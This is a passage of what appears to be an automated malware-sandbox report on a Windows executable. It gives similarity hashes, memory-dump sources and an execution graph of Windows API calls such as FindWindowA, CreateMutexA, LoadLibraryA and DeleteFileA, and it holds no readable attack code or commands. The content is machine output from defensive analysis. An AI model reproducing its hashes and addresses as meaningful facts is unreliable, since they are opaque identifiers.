                                                                                  • API ID: CriticalSection$Enter$AllocInitializeLeaveLocal
                                                                                  • String ID: 8D
                                                                                  • API String ID: 296031713-1967805434
                                                                                  • Opcode ID: a44731e93a0f204b40ed7d7bcc83b39b21edeceea7b07c4e26175fdc45d350eb
                                                                                  • Instruction ID: ed07ada503c9dfb2e1eb27cc502ea44feb9c5f3764cbaabb531550d88a14e1fb
                                                                                  • Opcode Fuzzy Hash: a44731e93a0f204b40ed7d7bcc83b39b21edeceea7b07c4e26175fdc45d350eb
                                                                                  • Instruction Fuzzy Hash: D641D1B2A40705DFDB10CF69DE8561A77A0FB58314B15827BD944B73E2D3789941CB8C
                                                                                  APIs
                                                                                  • RtlUnwind.KERNEL32(?,0040303C,00000000,00000000), ref: 00403037
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2984564666.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2984531710.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2984595057.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2984621478.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_JtDj8LXROa.jbxd
                                                                                  Similarity
                                                                                  • API ID: Unwind
                                                                                  • String ID: Z@$[@
                                                                                  • API String ID: 3419175465-147614250
                                                                                  • Opcode ID: 632dd5742b4fb914bceb69f3d5896245d08280a8e63092294e3cb9e77bea6d8e
                                                                                  • Instruction ID: feeb55291ebe1522cee6ecef3b159420e260652dc7edd15d544dc5a864a16f0c
                                                                                  • Opcode Fuzzy Hash: 632dd5742b4fb914bceb69f3d5896245d08280a8e63092294e3cb9e77bea6d8e
                                                                                  • Instruction Fuzzy Hash: F41182352046029BD724DE18CA89B2777B5AB44744F24C13AA404AB3DAC77CDC81A769
                                                                                  APIs
                                                                                  • Sleep.KERNEL32(?,?,?,?,0000000D,?,00409DD1,000000FA,00000032,00409E38,?,?,?), ref: 0040913F
                                                                                  • Sleep.KERNEL32(?,?,?,?,0000000D,?,00409DD1,000000FA,00000032,00409E38,?,?,?), ref: 0040914F
                                                                                  • GetLastError.KERNEL32(?,?,?,0000000D,?,00409DD1,000000FA,00000032,00409E38,?,?,?), ref: 00409162
                                                                                  • GetLastError.KERNEL32(?,?,?,0000000D,?,00409DD1,000000FA,00000032,00409E38,?,?,?), ref: 0040916C
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2984564666.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2984531710.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2984595057.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2984621478.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_JtDj8LXROa.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorLastSleep
                                                                                  • String ID:
                                                                                  • API String ID: 1458359878-0
                                                                                  • Opcode ID: f8f12bb7e90a2af36d9d63836ff22b9ff7ae443db3fef5bf3646314056d955e6
                                                                                  • Instruction ID: d872456f0eb4984acdd5aaf6accc14d53b49a8efe1dcc5862b878bd2442d96c4
                                                                                  • Opcode Fuzzy Hash: f8f12bb7e90a2af36d9d63836ff22b9ff7ae443db3fef5bf3646314056d955e6
                                                                                  • Instruction Fuzzy Hash: 61F02B7270011667EB30A59BCD89F1FA368DE92754710003BF945FF383D538DC4182A8

                                                                                  Execution Graph

                                                                                  Execution Coverage:15.6%
                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                  Signature Coverage:6.7%
                                                                                  Total number of Nodes:2000
                                                                                  Total number of Limit Nodes:68
                                                                                  execution_graph 53172 485fa8 53173 485fdc 53172->53173 53174 485fde 53173->53174 53175 485ff2 53173->53175 53308 4462f0 18 API calls 53174->53308 53178 48602e 53175->53178 53179 486001 53175->53179 53177 485fe7 Sleep 53239 486029 53177->53239 53184 48606a 53178->53184 53185 48603d 53178->53185 53181 44634c 18 API calls 53179->53181 53180 403438 4 API calls 53182 48649c 53180->53182 53183 486010 53181->53183 53187 486018 FindWindowA 53183->53187 53190 486079 53184->53190 53195 4860c0 53184->53195 53186 44634c 18 API calls 53185->53186 53188 48604a 53186->53188 53189 4465cc 5 API calls 53187->53189 53191 486052 FindWindowA 53188->53191 53189->53239 53309 4462f0 18 API calls 53190->53309 53194 4465cc 5 API calls 53191->53194 53193 486085 53310 4462f0 18 API calls 53193->53310 53197 486065 53194->53197 53198 48611c 53195->53198 53199 4860cf 53195->53199 53197->53239 53205 486178 53198->53205 53206 48612b 53198->53206 53313 4462f0 18 API calls 53199->53313 53200 486092 53311 4462f0 18 API calls 53200->53311 53203 4860db 53314 4462f0 18 API calls 53203->53314 53204 48609f 53312 4462f0 18 API calls 53204->53312 53216 4861b2 53205->53216 53217 486187 53205->53217 53318 4462f0 18 API calls 53206->53318 53208 4860e8 53315 4462f0 18 API calls 53208->53315 53212 4860aa SendMessageA 53215 4465cc 5 API calls 53212->53215 53213 486137 53319 4462f0 18 API calls 53213->53319 53214 4860f5 53316 4462f0 18 API calls 53214->53316 53215->53197 53226 486200 53216->53226 53227 4861c1 53216->53227 53220 44634c 18 API calls 53217->53220 53223 486194 53220->53223 53221 486144 53320 4462f0 18 API calls 53221->53320 53222 486100 PostMessageA 53317 446424 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 53222->53317 53231 48619c RegisterClipboardFormatA 53223->53231 53225 486151 53321 4462f0 18 API calls 53225->53321 53237 48620f 53226->53237 53238 486254 53226->53238 53323 4462f0 18 API calls 53227->53323 53234 4465cc 5 API calls 53231->53234 53232 48615c SendNotifyMessageA 53322 446424 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 53232->53322 53233 4861cd 53324 4462f0 18 API calls 53233->53324 53234->53239 53326 4462f0 18 API calls 53237->53326 53246 4862a8 53238->53246 53247 486263 53238->53247 53239->53180 53240 4861da 53325 4462f0 18 API calls 53240->53325 53242 48621b 53327 4462f0 18 API calls 53242->53327 53245 4861e5 SendMessageA 53249 4465cc 5 API calls 53245->53249 53254 48630a 53246->53254 53255 4862b7 53246->53255 53330 4462f0 18 API calls 53247->53330 53248 486228 53328 4462f0 18 API calls 53248->53328 53249->53197 53252 48626f 53331 4462f0 18 API calls 53252->53331 53253 486233 PostMessageA 53329 446424 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 53253->53329 53263 486319 53254->53263 53264 486391 53254->53264 53258 44634c 18 API calls 53255->53258 53260 4862c4 53258->53260 53259 48627c 53332 4462f0 18 API calls 53259->53332 53265 42e158 2 API calls 53260->53265 53262 486287 SendNotifyMessageA 53333 446424 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 53262->53333 53267 44634c 18 API calls 53263->53267 53273 4863a0 53264->53273 53274 4863c6 53264->53274 53268 4862d1 53265->53268 53269 486328 53267->53269 53270 4862e7 GetLastError 53268->53270 53271 4862d7 53268->53271 53334 4462f0 18 API calls 53269->53334 53275 4465cc 5 API calls 53270->53275 53272 4465cc 5 API calls 53271->53272 53276 4862e5 53272->53276 53339 4462f0 18 API calls 53273->53339 53282 4863f8 53274->53282 53283 4863d5 53274->53283 53275->53276 53279 4465cc 5 API calls 53276->53279 53278 4863aa FreeLibrary 53340 446424 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 53278->53340 53279->53239 53291 486407 53282->53291 53297 48643b 53282->53297 53285 44634c 18 API calls 53283->53285 53284 48633b GetProcAddress 53286 486381 53284->53286 53287 486347 53284->53287 53288 4863e1 53285->53288 53338 446424 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 53286->53338 53335 4462f0 18 API calls 53287->53335 53294 4863e9 CreateMutexA 53288->53294 53295 44634c 18 API calls 53291->53295 53292 486353 53336 4462f0 18 API calls 53292->53336 53294->53239 53299 486413 53295->53299 53296 486360 53300 4465cc 5 API calls 53296->53300 53297->53239 53298 44634c 18 API calls 53297->53298 53305 486456 53298->53305 53301 486424 OemToCharBuffA 53299->53301 53302 486371 53300->53302 53341 4466a0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 53301->53341 53337 446424 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 53302->53337 53306 486467 CharToOemBuffA 53305->53306 53342 4466a0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 53306->53342 53308->53177 53309->53193 53310->53200 53311->53204 53312->53212 53313->53203 53314->53208 53315->53214 53316->53222 53317->53197 53318->53213 53319->53221 53320->53225 53321->53232 53322->53239 53323->53233 53324->53240 53325->53245 53326->53242 53327->53248 53328->53253 53329->53197 53330->53252 53331->53259 53332->53262 53333->53239 53334->53284 53335->53292 53336->53296 53337->53197 53338->53197 53339->53278 53340->53239 53341->53239 53342->53239 53343 4640e4 53344 4640f5 53343->53344 53345 4640f0 53343->53345 53346 4640f3 53344->53346 53436 46353c 37 API calls 53344->53436 53345->53346 53350 463b50 53345->53350 53349 464109 53351 407878 19 API calls 53350->53351 53353 463ba3 53351->53353 53352 464012 53354 46405e 53352->53354 53355 46402d 53352->53355 53353->53352 53356 463c6d 53353->53356 53359 4034ac 4 API calls 53353->53359 53360 4034ac 4 API calls 53354->53360 53358 4034ac 4 API calls 53355->53358 53357 463c88 53356->53357 53362 463cc7 53356->53362 53363 4034ac 4 API calls 53357->53363 53364 46403b 53358->53364 53365 463bf5 53359->53365 53361 46406c 53360->53361 53443 462d90 10 API calls 53361->53443 53370 403418 4 API calls 53362->53370 53367 463c96 53363->53367 53442 462d90 10 API calls 53364->53442 53369 414a60 4 API calls 53365->53369 53371 414a60 4 API calls 53367->53371 53373 463c14 53369->53373 53385 463cc5 53370->53385 53375 463cb5 53371->53375 53372 464049 53374 403418 4 API calls 53372->53374 53376 40364c 4 API calls 53373->53376 53378 46408f 53374->53378 53380 40364c 4 API calls 53375->53380 53381 463c24 53376->53381 53377 4633fc SendMessageA 53383 463ce7 53377->53383 53384 403418 4 API calls 53378->53384 53379 463e27 53382 403418 4 API calls 53379->53382 53380->53385 53386 414a60 4 API calls 53381->53386 53387 463e25 53382->53387 53388 463d23 53383->53388 53389 463ced 53383->53389 53390 464097 53384->53390 53385->53377 53423 463da7 53385->53423 53391 463c38 53386->53391 53437 4637b8 34 API calls 53387->53437 53394 403418 4 API calls 53388->53394 53392 4034ac 4 API calls 53389->53392 53393 403438 4 API calls 53390->53393 53391->53356 53395 414a60 4 API calls 53391->53395 53396 463cfb 53392->53396 53397 4640a4 53393->53397 53399 463d21 53394->53399 53400 463c5d 53395->53400 53402 471e10 34 API calls 53396->53402 53397->53346 53398 463de8 53403 4034ac 4 API calls 53398->53403 53408 463648 34 API calls 53399->53408 53404 40364c 4 API calls 53400->53404 53406 463d11 53402->53406 53407 463df6 53403->53407 53404->53356 53405 463e50 53413 463eaf 53405->53413 53414 463e5b 53405->53414 53409 40364c 4 API calls 53406->53409 53410 414a60 4 API calls 53407->53410 53411 463d4a 53408->53411 53409->53399 53412 463e15 53410->53412 53418 463d55 53411->53418 53419 463da9 53411->53419 53415 40364c 4 API calls 53412->53415 53416 403418 4 API calls 53413->53416 53417 4034ac 4 API calls 53414->53417 53415->53387 53420 463eb7 53416->53420 53425 463e69 53417->53425 53422 4034ac 4 API calls 53418->53422 53421 403418 4 API calls 53419->53421 53424 463ead 53420->53424 53435 463f5e 53420->53435 53421->53423 53428 463d63 53422->53428 53423->53379 53423->53398 53424->53420 53438 488348 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53424->53438 53425->53420 53425->53424 53429 40364c 4 API calls 53425->53429 53427 463eda 53427->53435 53439 4885b0 18 API calls 53427->53439 53428->53423 53431 40364c 4 API calls 53428->53431 53429->53425 53431->53428 53433 463fff 53441 4290bc SendMessageA SendMessageA 53433->53441 53440 42906c SendMessageA 53435->53440 53436->53349 53437->53405 53438->53427 53439->53435 53440->53433 53441->53352 53442->53372 53443->53372 46070 402584 46071 402598 46070->46071 46072 4025ab 46070->46072 46100 4019cc RtlInitializeCriticalSection RtlEnterCriticalSection LocalAlloc RtlLeaveCriticalSection 46071->46100 46074 4025c2 RtlEnterCriticalSection 46072->46074 46075 4025cc 46072->46075 46074->46075 46086 4023b4 13 API calls 46075->46086 46076 40259d 46076->46072 46078 4025a1 46076->46078 46079 4025d5 46080 4025d9 46079->46080 46087 402088 46079->46087 46082 402635 46080->46082 46083 40262b RtlLeaveCriticalSection 46080->46083 46083->46082 46084 4025e5 46084->46080 46101 402210 9 API calls 46084->46101 46086->46079 46088 40209c 46087->46088 46089 4020af 46087->46089 46108 4019cc RtlInitializeCriticalSection RtlEnterCriticalSection LocalAlloc RtlLeaveCriticalSection 46088->46108 46090 4020c6 RtlEnterCriticalSection 46089->46090 46094 4020d0 46089->46094 46090->46094 46092 4020a1 46092->46089 46093 4020a5 46092->46093 46095 402106 46093->46095 46094->46095 46102 401f94 46094->46102 46095->46084 46098 4021f1 RtlLeaveCriticalSection 46099 4021fb 46098->46099 46099->46084 46100->46076 46101->46080 46105 401fa4 46102->46105 46103 401fd0 46107 401ff4 46103->46107 46114 401db4 46103->46114 46105->46103 46105->46107 46109 401f0c 46105->46109 46107->46098 46107->46099 46108->46092 46118 40178c 46109->46118 46112 401f29 46112->46105 46115 401e02 46114->46115 46116 401dd2 46114->46116 46115->46116 46141 401d1c 46115->46141 46116->46107 46119 4017a8 46118->46119 46120 4017b2 46119->46120 46125 401803 46119->46125 46127 40180f 46119->46127 46129 4014e4 46119->46129 46138 4013e0 LocalAlloc 46119->46138 46137 401678 VirtualAlloc 46120->46137 46124 4017be 46124->46127 46139 4015c0 VirtualFree 46125->46139 46127->46112 46128 401e80 9 API calls 46127->46128 46128->46112 46130 4014f3 VirtualAlloc 46129->46130 46132 401520 46130->46132 46133 401543 46130->46133 46140 401398 LocalAlloc 46132->46140 46133->46119 46135 40152c 46135->46133 46136 401530 VirtualFree 46135->46136 46136->46133 46137->46124 46138->46119 46139->46127 46140->46135 46142 401d2e 46141->46142 46143 401d51 46142->46143 46144 401d63 46142->46144 46154 401940 46143->46154 46146 401940 3 API calls 46144->46146 46147 401d61 46146->46147 46153 401d79 46147->46153 46164 401bf8 9 API calls 46147->46164 46149 401da2 46166 401454 LocalAlloc 46149->46166 46150 401d88 46150->46149 46165 401c4c 9 API calls 46150->46165 46153->46116 46155 401966 46154->46155 46163 4019bf 46154->46163 46167 40170c 46155->46167 46159 401983 46160 40199a 46159->46160 46172 4015c0 VirtualFree 46159->46172 46160->46163 46173 401454 LocalAlloc 46160->46173 46163->46147 46164->46150 46165->46149 46166->46153 46170 401743 46167->46170 46168 401783 46171 4013e0 LocalAlloc 46168->46171 46169 40175d VirtualFree 46169->46170 46170->46168 46170->46169 46171->46159 46172->46160 46173->46163 46174 447a40 46175 447a75 46174->46175 46176 447a6e 46174->46176 46177 447a89 46175->46177 46230 447880 46175->46230 46264 403418 46176->46264 46177->46176 46206 4034ac 46177->46206 46182 447aa2 46210 4037d0 46182->46210 46184 447abe 46185 4037d0 4 API calls 46184->46185 46186 447ada 46185->46186 46186->46176 46187 447aee 46186->46187 46188 4037d0 4 API calls 46187->46188 46189 447b08 46188->46189 46215 430fac 46189->46215 46191 447b2a 46193 447b4a 46191->46193 46253 43107c 46191->46253 46195 447b88 46193->46195 46259 442944 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 46193->46259 46199 447ba0 46195->46199 46260 442944 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 46195->46260 46198 447bd4 GetLastError 46261 447814 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 46198->46261 46219 4416a8 46199->46219 46201 447be3 46262 442984 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 46201->46262 46203 447bf8 46263 442994 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 46203->46263 46205 447c00 46208 4034b0 46206->46208 46207 4034d2 46207->46182 46208->46207 46268 402660 46208->46268 46273 40375c 46210->46273 46212 403814 46212->46184 46213 4037de 46213->46212 46277 4038bc 46213->46277 46216 430fb2 46215->46216 46217 402648 4 API calls 46216->46217 46218 430fe2 46217->46218 46218->46191 46220 442686 46219->46220 46221 4416e1 46219->46221 46223 403418 4 API calls 46220->46223 46222 403418 4 API calls 46221->46222 46224 4416e9 46222->46224 46225 44269b 46223->46225 46226 430fac 4 API calls 46224->46226 46225->46198 46228 4416f5 46226->46228 46227 442676 46227->46198 46228->46227 46297 440d80 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 46228->46297 46231 4034ac 4 API calls 46230->46231 46232 4478b6 46231->46232 46233 4037d0 4 API calls 46232->46233 46234 4478c8 46233->46234 46298 403790 46234->46298 46236 4478e9 46237 4037d0 4 API calls 46236->46237 46238 447901 46237->46238 46239 4479b2 46238->46239 46240 447949 LoadLibraryA 46238->46240 46242 447930 46238->46242 46305 403b98 46238->46305 46308 403468 46238->46308 46314 43cdfc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 46238->46314 46244 403790 4 API calls 46239->46244 46240->46238 46240->46242 46241 403418 4 API calls 46243 447a13 46241->46243 46242->46241 46315 403438 46243->46315 46247 4479d3 46244->46247 46250 4479db GetProcAddress 46247->46250 46251 4479ee 46250->46251 46251->46242 46254 43108a 46253->46254 46255 43109c 46253->46255 46324 402678 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 46254->46324 46257 4310be 46255->46257 46325 43101c LocalAlloc TlsSetValue TlsGetValue TlsGetValue 46255->46325 46257->46191 46259->46193 46260->46199 46261->46201 46262->46203 46263->46205 46265 403437 46264->46265 46266 40341e 46264->46266 46266->46265 46267 402660 4 API calls 46266->46267 46267->46265 46269 402664 46268->46269 46270 40266e 46268->46270 46269->46270 46272 4033d4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 46269->46272 46270->46207 46272->46270 46274 403762 46273->46274 46276 403773 46273->46276 46274->46276 46286 4034d4 46274->46286 46276->46213 46278 4038c9 46277->46278 46285 4038f9 46277->46285 46280 4038f2 46278->46280 46281 4038d5 46278->46281 46279 403418 4 API calls 46283 4038e3 46279->46283 46282 4034d4 4 API calls 46280->46282 46296 402678 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 46281->46296 46282->46285 46283->46212 46285->46279 46287 4034f4 46286->46287 46288 4034d8 46286->46288 46287->46276 46291 402648 46288->46291 46290 4034e1 46290->46276 46292 40264c 46291->46292 46293 402656 46291->46293 46292->46293 46295 4033d4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 46292->46295 46293->46290 46293->46293 46295->46293 46296->46283 46297->46228 46299 4037c2 46298->46299 46300 403795 46298->46300 46301 403418 4 API calls 46299->46301 46300->46299 46303 4037a9 46300->46303 46302 4037b8 46301->46302 46302->46236 46319 4034f8 46303->46319 46306 402648 4 API calls 46305->46306 46307 403b9e 46306->46307 46307->46238 46309 40346c 46308->46309 46312 40347c 46308->46312 46311 4034d4 4 API calls 46309->46311 46309->46312 46310 4034a8 46310->46238 46311->46312 46312->46310 46313 402660 4 API calls 46312->46313 46313->46310 46314->46238 46317 40343e 46315->46317 46316 403463 46316->46177 46317->46316 46318 402660 4 API calls 46317->46318 46318->46317 46320 4034d4 4 API calls 46319->46320 46321 403508 46320->46321 46322 403418 4 API calls 46321->46322 46323 403520 46322->46323 46323->46302 46324->46255 46325->46257 46326 48bf4c 46372 40335c 46326->46372 46328 48bf5a 46375 4056b8 46328->46375 46330 48bf5f 46378 4098d0 46330->46378 46657 403314 46372->46657 46374 403361 GetModuleHandleA GetCommandLineA 46374->46328 46377 4056f3 46375->46377 46658 4033d4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 46375->46658 46377->46330 46659 408fa8 46378->46659 46657->46374 46658->46377 46731 408c40 46659->46731 46662 408560 GetSystemDefaultLCID 46666 408596 46662->46666 46663 406d70 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 46663->46666 46664 4084ec LocalAlloc TlsSetValue TlsGetValue TlsGetValue GetLocaleInfoA 46664->46666 46665 403468 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 46665->46666 46666->46663 46666->46664 46666->46665 46670 4085f8 46666->46670 46667 406d70 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 46667->46670 46668 4084ec LocalAlloc TlsSetValue TlsGetValue TlsGetValue GetLocaleInfoA 46668->46670 46669 403468 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 46669->46670 46670->46667 46670->46668 46670->46669 46671 40867b 46670->46671 46672 403438 4 API calls 46671->46672 46673 408695 46672->46673 46674 4086a4 GetSystemDefaultLCID 46673->46674 46742 4084ec GetLocaleInfoA 46674->46742 46677 403468 4 API calls 46678 4086e4 46677->46678 46679 4084ec 5 API calls 46678->46679 46680 4086f9 46679->46680 46681 4084ec 5 API calls 46680->46681 46682 40871d 46681->46682 46748 408538 GetLocaleInfoA 46682->46748 46685 408538 GetLocaleInfoA 46686 40874d 46685->46686 46687 4084ec 5 API calls 46686->46687 46688 408767 46687->46688 46689 408538 GetLocaleInfoA 46688->46689 46690 408784 46689->46690 46691 4084ec 5 API calls 46690->46691 46692 40879e 46691->46692 46693 403468 4 API calls 46692->46693 46694 4087ab 46693->46694 46695 4084ec 5 API calls 46694->46695 46696 4087c0 46695->46696 46697 403468 4 API calls 46696->46697 46698 4087cd 46697->46698 46699 408538 GetLocaleInfoA 46698->46699 46700 4087db 46699->46700 46701 4084ec 5 API calls 46700->46701 46702 4087f5 46701->46702 46703 403468 4 API calls 46702->46703 46704 408802 46703->46704 46705 4084ec 5 API calls 46704->46705 46706 408817 46705->46706 46707 403468 4 API calls 46706->46707 46708 408824 46707->46708 46709 4084ec 5 API calls 46708->46709 46710 408839 46709->46710 46711 408856 46710->46711 46712 408847 46710->46712 46714 4034ac 4 API calls 46711->46714 46713 4034ac 4 API calls 46712->46713 46715 408854 46713->46715 46714->46715 46716 4084ec 5 API calls 46715->46716 46717 408878 46716->46717 46718 408895 46717->46718 46719 408886 46717->46719 46720 403418 4 API calls 46718->46720 46721 4034ac 4 API calls 46719->46721 46722 408893 46720->46722 46721->46722 46750 40364c 46722->46750 46732 408c4c 46731->46732 46739 406d70 LoadStringA 46732->46739 46735 403468 4 API calls 46736 408c7d 46735->46736 46737 403418 4 API calls 46736->46737 46738 408c92 46737->46738 46738->46662 46740 4034f8 4 API calls 46739->46740 46741 406d9d 46740->46741 46741->46735 46743 408513 46742->46743 46744 408525 46742->46744 46745 4034f8 4 API calls 46743->46745 46746 4034ac 4 API calls 46744->46746 46747 408523 46745->46747 46746->46747 46747->46677 46749 408554 46748->46749 46749->46685 46751 403654 46750->46751 46752 4034d4 4 API calls 46751->46752 46753 403667 46752->46753 46754 403468 4 API calls 46753->46754 46755 40368f 46754->46755 53444 416564 73A25CF0 53445 40ce68 53446 40ce75 53445->53446 53447 40ce7a 53445->53447 53449 406ecc CloseHandle 53446->53449 53449->53447 48957 440708 48958 440711 48957->48958 48959 44071f WriteFile 48957->48959 48958->48959 48960 44072a 48959->48960 48961 485218 48962 485252 48961->48962 48963 48525e 48962->48963 48964 485254 48962->48964 48966 48526d 48963->48966 48967 485296 48963->48967 49169 40901c MessageBeep 48964->49169 48969 44634c 18 API calls 48966->48969 48972 4852ce 48967->48972 48973 4852a5 48967->48973 48968 403438 4 API calls 48970 4858aa 48968->48970 48971 48527a 48969->48971 48974 403418 4 API calls 48970->48974 49170 406b34 48971->49170 48982 4852dd 48972->48982 48983 485306 48972->48983 48976 44634c 18 API calls 48973->48976 48977 4858b2 48974->48977 48979 4852b2 48976->48979 49178 406b84 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 48979->49178 48985 44634c 18 API calls 48982->48985 48988 48532e 48983->48988 48989 485315 48983->48989 48984 4852bd 49179 4466a0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 48984->49179 48987 4852ea 48985->48987 49180 406bb8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 48987->49180 48996 48533d 48988->48996 48997 485362 48988->48997 49182 407204 LocalAlloc TlsSetValue TlsGetValue TlsGetValue GetCurrentDirectoryA 48989->49182 48991 4852f5 49181 4466a0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 48991->49181 48994 48531d 49183 4466a0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 48994->49183 48998 44634c 18 API calls 48996->48998 49001 48539a 48997->49001 49002 485371 48997->49002 48999 48534a 48998->48999 49184 40722c 48999->49184 49007 4853a9 49001->49007 49008 4853d2 49001->49008 49004 44634c 18 API calls 49002->49004 49003 485352 49187 446424 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 49003->49187 49006 48537e 49004->49006 49009 42c6cc 5 API calls 49006->49009 49010 44634c 18 API calls 49007->49010 49015 48541e 49008->49015 49016 4853e1 49008->49016 49011 485389 49009->49011 49012 4853b6 49010->49012 49188 4466a0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 49011->49188 49189 40717c 8 API calls 49012->49189 49021 48542d 49015->49021 49022 485456 49015->49022 49018 44634c 18 API calls 49016->49018 49017 4853c1 49190 4466a0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 49017->49190 49020 4853f0 49018->49020 49023 44634c 18 API calls 49020->49023 49025 44634c 18 API calls 49021->49025 49028 48548e 49022->49028 49029 485465 49022->49029 49024 485401 49023->49024 49191 484f1c 9 API calls 49024->49191 49027 48543a 49025->49027 49031 42c76c 5 API calls 49027->49031 49038 48549d 49028->49038 49039 4854c6 49028->49039 49032 44634c 18 API calls 49029->49032 49030 48540d 49192 4466a0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 49030->49192 49034 485445 49031->49034 49035 485472 49032->49035 49193 4466a0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 49034->49193 49194 42c794 LocalAlloc TlsSetValue TlsGetValue TlsGetValue IsDBCSLeadByte 49035->49194 49041 44634c 18 API calls 49038->49041 49044 4854fe 49039->49044 49045 4854d5 49039->49045 49040 48547d 49195 4466a0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 49040->49195 49043 4854aa 49041->49043 49196 42c7c4 49043->49196 49051 48550d 49044->49051 49052 485536 49044->49052 49048 44634c 18 API calls 49045->49048 49050 4854e2 49048->49050 49053 42c7f4 5 API calls 49050->49053 49054 44634c 18 API calls 49051->49054 49059 485582 49052->49059 49060 485545 49052->49060 49055 4854ed 49053->49055 49056 48551a 49054->49056 49205 4466a0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 49055->49205 49206 42c81c 49056->49206 49065 485591 49059->49065 49066 4855d4 49059->49066 49062 44634c 18 API calls 49060->49062 49064 485554 49062->49064 49067 44634c 18 API calls 49064->49067 49068 44634c 18 API calls 49065->49068 49073 4855e3 49066->49073 49074 485647 49066->49074 49069 485565 49067->49069 49070 4855a4 49068->49070 49212 42c418 LocalAlloc TlsSetValue TlsGetValue TlsGetValue IsDBCSLeadByte 49069->49212 49075 44634c 18 API calls 49070->49075 49072 485571 49213 4466a0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 49072->49213 49149 44634c 49073->49149 49081 485686 49074->49081 49082 485656 49074->49082 49078 4855b5 49075->49078 49214 485114 12 API calls 49078->49214 49093 4856c5 49081->49093 49094 485695 49081->49094 49085 44634c 18 API calls 49082->49085 49084 4855c3 49215 4466a0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 49084->49215 49088 485663 49085->49088 49218 4508d4 Wow64DisableWow64FsRedirection SetLastError Wow64RevertWow64FsRedirection DeleteFileA GetLastError 49088->49218 49089 485602 49092 44634c 18 API calls 49089->49092 49090 485637 49217 446424 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 49090->49217 49098 485611 49092->49098 49104 485704 49093->49104 49105 4856d4 49093->49105 49099 44634c 18 API calls 49094->49099 49096 485259 49096->48968 49097 485670 49219 446424 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 49097->49219 49162 450c4c 49098->49162 49100 4856a2 49099->49100 49220 4507d4 49100->49220 49113 48574c 49104->49113 49114 485713 49104->49114 49109 44634c 18 API calls 49105->49109 49106 485681 49106->49096 49107 485621 49216 446424 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 49107->49216 49108 4856af 49227 446424 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 49108->49227 49112 4856e1 49109->49112 49228 450ddc Wow64DisableWow64FsRedirection SetLastError Wow64RevertWow64FsRedirection RemoveDirectoryA GetLastError 49112->49228 49121 48575b 49113->49121 49122 485794 49113->49122 49116 44634c 18 API calls 49114->49116 49118 485722 49116->49118 49117 4856ee 49229 446424 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 49117->49229 49120 44634c 18 API calls 49118->49120 49123 485733 49120->49123 49124 44634c 18 API calls 49121->49124 49127 4857a7 49122->49127 49133 48585d 49122->49133 49230 4465cc 49123->49230 49125 48576a 49124->49125 49126 44634c 18 API calls 49125->49126 49128 48577b 49126->49128 49130 44634c 18 API calls 49127->49130 49134 4465cc 5 API calls 49128->49134 49131 4857d4 49130->49131 49132 44634c 18 API calls 49131->49132 49135 4857eb 49132->49135 49133->49096 49239 4462f0 18 API calls 